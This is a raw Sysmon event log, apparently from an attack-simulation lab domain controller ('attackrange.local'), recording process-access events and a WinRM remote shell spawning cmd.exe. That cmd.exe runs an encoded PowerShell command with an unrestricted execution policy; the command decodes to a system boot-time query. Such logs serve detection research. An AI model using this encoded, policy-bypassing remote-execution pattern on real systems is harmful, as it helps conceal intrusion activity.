08:40:28.071{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-167C-5F84-1803-000000007E01}5100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-167C-5F84-1603-000000007E01}1368644C:\Windows\system32\WinrsHost.exe{5D479F2C-167C-5F84-1803-000000007E01}5100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.078{5D479F2C-167C-5F84-1803-000000007E01}5100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167C-5F84-1010-120000000000}0x1210100HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.071{5D479F2C-1507-5F84-1300-000000007E01}13081432C:\Windows\system32\svchost.exe{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.056{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.056{5D479F2C-167C-5F84-1703-000000007E01}45764476C:\Windows\system32\conhost.exe{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-167C-5F84-1703-000000007E01}4576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.047{5D479F2C-167C-5F84-1603-000000007E01}1368C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-167C-5F84-1010-120000000000}0x1210100HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:28.040{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 